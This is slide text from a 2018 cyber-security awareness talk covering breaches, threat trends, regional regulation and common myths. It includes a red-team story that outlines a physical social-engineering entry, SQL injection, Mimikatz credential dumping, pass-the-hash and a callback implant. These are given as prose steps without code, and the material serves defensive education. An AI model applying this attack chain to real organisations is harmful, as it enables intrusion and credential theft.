SCM Symposium PPT Format Customer loyalty is predi
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
1. Cyber Security 101: Back to the Basics
Shah H. Sheikh – Founder / Sr. Cyber Security Consultant / Advisor
MEng CISSP CISA CISM CRISC CCSK CPSA (CREST UK)
E: shah@dts-solution.com
https://www.linkedin.com/in/shahsheikh/
2. AGENDA
• Introduction to Cyber Security 101
• The Cyber Incidents and Breaches that made the headlines
• Types of Cyber Threats and Threat Actors in the Region
• Facts and Figures – Cyber Security
• Industries impacted by cyber threats and its implication
• Overview on Local Regulation and Industry Standards
• The Cyber Security MYTHS and how we need to go back to the BASICS – 101
• Q&A
3. CYBER SECURITY 101
“By 2020, 100% of large enterprises will be asked to report to
their board of directors on cybersecurity”
Source: Gartner
“It takes 20 years to build a reputation and few minutes of
cyber-incident to ruin it.”
Stephane Nappo
4. CYBER SECURITY 101
What is Cyber Security?
• Protection of mission and business critical assets in the form of logical security controls
(this is not physical security) to ensure no adverse impact of any kind to the business.
Why is it important?
• Globalized Digital Data – Every organization has digital information data, many
enterprises trade and carry business transactions online, each and every enterprise is
connected to the internet in one form or another – cyber security threats can
materialize from external and internal boundaries. Critical Infrastructure needs to be
protected….
5. • Cybersecurity is getting worse, not better
• Damages expected to double to $6 trillion by 20211
• New threats easily evade outdated security models
• Investment continues in redundant, ineffective solutions
• Business & consumer confidence is declining
• 66% of businesses have experience a data breach2
• Average annual costs = $9.5M, up 21%3
• 64% of US consumers experienced data theft4
Today’s Security Situation
1. Cybersecurity Ventures Report, 2. Thales Security, 3. 451 Research, 4. Pew Research
“Despite more and more money spent on security each year, our
collective problems continue to worsen” - 451 Research
6. North Korean banking
theft from Bangladesh
SWIFT
Exploited Linux BASH
Shell vulnerability
Shell
Shock
Spear phishing against
Middle East nations
Syrian Electronic
Army
Targeted Iranian
nuclear program
StuxNET
Ransomware
variant
Bad Rabbit
Apache Struts
vulnerability
Equifax
DNS Server
memory attack
Linux
System-D
Precursor to
WannaCry
Adylkuzz
Massive scale SMB
ransomware exploit
WannaCry
EternalBlue exploit
of SMBv1 flaw
Petya &
NotPetya
Exploits Linux
Stack Guard flaw
Linux Stack
Clash
Industrial Control
System attack
Industroyer
Breached by
Chinese hackers
OPM
Exploited SSL
vulnerability
Heartbleed
DoublePulsarEternalBlue
EternalRock
EternalRomance
DewDrop Orangutan Reticulum
Ongoing leaks
of NSA toolkits
Shadow
Brokers
Attacks Massive Scale Leaks & Tools
• Massive increase in quantity and damage caused
• Fileless techniques bypass conventional security
• Advanced attacks have become mainstream
• High-value, critical infrastructure increasingly at risk
Leaks of
NSA toolkits
Snowden
2010 201720162012 2014
Sophisticated Fileless Attacks
7. Cyber Incident Dwell Time
106 days in Middle East in Y2016
175 days in Middle East in Y2017
9. Y2018-2021 Predictions
1 Artificial Intelligence (AI) will be weaponized to create mass scale attacks.
Large Scale Massive Data Breaches will continue. IoT ty
Crypto-jacking and malware created to perform cryptocurrency mining
will significantly rise.
File-less Attacks will continue to rise and increase in severity that target
the memory of endpoint / devices.
2
3
4
10. Y2018-2021 Predictions
4 Cyber-Physical Attacks on National Critical Infrastructure will prevail and
bring down city wide infrastructure.
Key government elections will be hacked causing civil unrest.
Laws and Regulations will be stricter leaving organizations no choice but to
take cybersecurity seriously. Board members or C-level executives will be
on legal trial for negligence due to a data breach
5
6
12. NESA / SIA DESC ADSSSA
National Mandate for Cyber Security
13. Story Time …
We were involved in an internal cyber security penetration test exercise
for a large enterprise IT environment – RED TEAMING. Our goal was to
demonstrate to the executive management team, that we can physically
‘hack’ into the customer IT environment and ”PWN” the infrastructure –
thereby simulating what a real threat actor would do.
We were given 5 days to accomplish this task.
14. Phase 1: RECON.&.DISCOVERY
• Phase one was performing a recon and discovery activity of the target facility
(Tower Block) and if time permits to ethically intrude;
• Reception (Sign-In with Emirates ID)
• Receptionist calls the client to confirm meeting
• Access Card to enter Security Controlled Turnstile
• Access the relevant floor to meet your client
• Next to the receptionist was a directory of all floors and tenants in the building
• Our target was any one of the following departments;
• Supply Chain / Procurement
• Finance
• HR
15. Phase 2: STAGE.&.LAUNCH
• After being given the necessary information post-recon phase, it was time to stage
and launch the attack. Our RED TEAM went in to deliver a fake RFP response to the
procurement team;
• The delivery man had a ‘stammer’ (our expert pen-tester) and left his wallet in the car
• After much deliberation the receptionist “human empathy” allowed the delivery man to bypass
all checks (exception: filling in visitor log book) and was given the go-ahead with the security
guard opening the turnstiles.
• The pen-tester accessed the floor where the procurement department were located
16. Phase 2: STAGE.&.LAUNCH
1 Identify Network Access Port (obtain network access)
• Data VLAN (not possible – NAC was deployed and enforced)
• VoIP VLAN (possible – access to the VOIP network but restricted to VOIP network only)
• Disconnected a MFP – got access by SPOOFING the MAC Address (sticker on the back panel)
• Printer Network on the same User Data Network
2 With DHCP we got the IP address and DNS servers
• Scanning and Recon Activities on the endpoints and servers
• Identified multiple MFPs across the same network
• MFP had a default web interface;
• Status Page
• Admin Panel (password protected)
• Bruteforced in 2 minutes
• MFP was integrated with 3rd party Print Management Suite
• We obtained the IP address of the 3rd party Print Management Suite and exploited a vulnerable input
registration form leading to SQLi to obtain admin credentials
• Once logged into the PMS as admin, we discovered it was integrated with corporate Active Directory
• The web application was poorly developed – the AD LDAP string was encoded in the HTML source
• We obtained the SERVICE ACCCOUNT used by this 3rd party PMS
17. Phase 3: EXPLOIT.&.INSTALL
3 We were now able to make LDAP queries to the AD
• Enumerated all Domain Users and Domain Computers
• Identify all privileges given to the SERVICE ACCOUNT for the 3rd party PMS
• One of them was remote access (RDP) to a server
4 We continued with RDP to that server using the compromised SERVICE account (still NO DOMAIN ADMIN yet)
• Once logged in with POWERSHELL we executed MIMIKATZ to DUMP passwords in memory (sysadmin)
• Create a domain admin privileged user
• We obtained SAM and SYSTEM file to obtain local admin password HASH
• We performed PASS-THE-HASH attack on all servers including Domain Controller
• We performed the same attack vector on endpoints / devices and obtained all the local password HASH
• With Anti-Virus / Anti-Malware protection
• No Administrative Privileges
• No Removable Media
• We installed a ‘dummy’ fake process on one machine to make an encrypted call-back to our cloud (“HOOK”)
18. Phase 4: PERSIST
5
Once call-back was successful, the compromised machine was now “hooked” and in our control and we could
then send remote instruction and continued with the penetration test offsite. Persistence and lateral
movement now prevails. All of this took one day….
The cyber kill chain
RECON STAGE LAUNCH EXPLOIT INSTALL CALLBACK PERSIST
target COMPROMISE BREACH
File Trajectory
Give me six hours to chop down a tree and I will spend the first four
sharpening the axe.
Abraham Lincoln
20. Cyber Security Myths….
• If I have an Anti-Virus solution I am protected…
• Small and Medium Enterprises / Business are not real targets…
• Only certain industries are prone to cyber-attacks
• I have never been breached before …
• A strong password is sufficient to protect me …
• Cyber threats originate from the outside
• Cyber security is the responsibility of IT …
• You will know right away if your endpoint device is infected….
• Complete cyber security can be achieved …